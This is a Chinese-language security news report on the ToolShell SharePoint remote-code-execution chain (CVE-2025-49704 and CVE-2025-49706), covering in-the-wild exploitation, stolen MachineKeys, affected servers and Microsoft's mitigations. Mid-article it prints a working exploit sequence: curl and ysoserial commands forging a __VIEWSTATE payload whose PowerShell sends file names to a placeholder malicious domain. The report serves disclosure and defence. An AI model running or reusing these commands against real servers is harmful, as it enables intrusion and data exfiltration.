圖片來源：CODE WHITE GmbH

2025年7月18日晚間，Eye Security安全團(tuán)隊(duì)發(fā)現(xiàn)一起大規(guī)模利用新型Microsoft SharePoint遠(yuǎn)程代碼執(zhí)行（RCE）漏洞鏈的攻擊活動，該漏洞鏈被命名為ToolShell。攻擊者通過組合利用CVE-2025-49704和CVE-2025-49706兩個(gè)漏洞，可在無需認(rèn)證的情況下完全控制本地部署的SharePoint服務(wù)器。

"這并非憑證泄露問題，而是已被武器化的Pwn2Own漏洞利用代碼在野利用"，Eye Security特別強(qiáng)調(diào)。

漏洞技術(shù)細(xì)節(jié)

ToolShell攻擊鏈包含兩個(gè)關(guān)鍵漏洞：

• CVE-2025-49706（CVSS 6.3）：SharePoint服務(wù)器欺騙漏洞
• CVE-2025-49704（CVSS 8.8）：通過ToolPane端點(diǎn)觸發(fā)的SharePoint RCE漏洞

初步分析認(rèn)為攻擊需要有效憑證，但深入調(diào)查顯示實(shí)際無需任何認(rèn)證。報(bào)告指出："對/_layouts/15/ToolPane.aspx的POST請求特征非常明顯...我們確信攻擊全程未使用任何憑證"。

攻擊手法分析

攻擊基于Code White GmbH曾在Pwn2Own上演示的概念驗(yàn)證代碼，現(xiàn)已被完全武器化。成功利用后，攻擊者可直接植入隱蔽的ASPX惡意負(fù)載而無需登錄。已觀測到的惡意文件spinstall0.aspx疑似基于Sharpyshell開發(fā)，其設(shè)計(jì)目的并非直接執(zhí)行命令，而是竊取加密機(jī)器密鑰。

"這不是典型的網(wǎng)頁后門...該頁面通過調(diào)用.NET內(nèi)部方法讀取SharePoint服務(wù)器的MachineKey配置"，研究人員解釋。這些密鑰（如ValidationKey和DecryptionKey）用于生成有效的__VIEWSTATE令牌——這是ASP.NET的核心安全機(jī)制。獲取密鑰后，攻擊者可使用ysoserial等工具簽署惡意負(fù)載實(shí)現(xiàn)完全遠(yuǎn)程代碼執(zhí)行。

# 通過任意公開SharePoint頁面獲取<VIEWSTATE_GENERATOR>
curl -s https://target/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

# 生成viewstate攻擊負(fù)載示例
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://malicious-domain/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

# 將生成的令牌附加至請求即可執(zhí)行命令(RCE)
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=<YSOSERIAL_GENERATED_PAYLOAD>

"這些負(fù)載可嵌入任意惡意命令，并被服務(wù)器視為可信輸入，最終在無需憑證的情況下完成RCE攻擊鏈"，報(bào)告補(bǔ)充道。

影響范圍與響應(yīng)措施

Eye Security掃描了8,000余臺暴露在公網(wǎng)的SharePoint服務(wù)器，發(fā)現(xiàn)數(shù)十臺已遭入侵。通過分析160字節(jié)的獨(dú)特響應(yīng)特征和spinstall0.aspx端點(diǎn)可識別受影響系統(tǒng)。

截至7月19日，Palo Alto Networks Unit 42確認(rèn)攻擊仍在持續(xù)，觀測到攻擊者：

• 通過PowerShell投放惡意ASPX負(fù)載
• 竊取機(jī)器密鑰建立持久化訪問
• 從可疑IP（如96[.]9[.]125[.]147）執(zhí)行攻擊模塊

微軟已發(fā)布緊急補(bǔ)丁和安全指南，建議本地部署SharePoint的用戶立即采取以下措施：

• 安裝7月補(bǔ)丁星期二發(fā)布的最新SharePoint更新
• 掃描入侵痕跡，重點(diǎn)檢查/ToolPane.aspx和/spinstall0.aspx路徑
• 檢查加密密鑰是否泄露，如已失竊需立即重新生成
• 監(jiān)控HTTP(S)外聯(lián)連接和反向Shell活動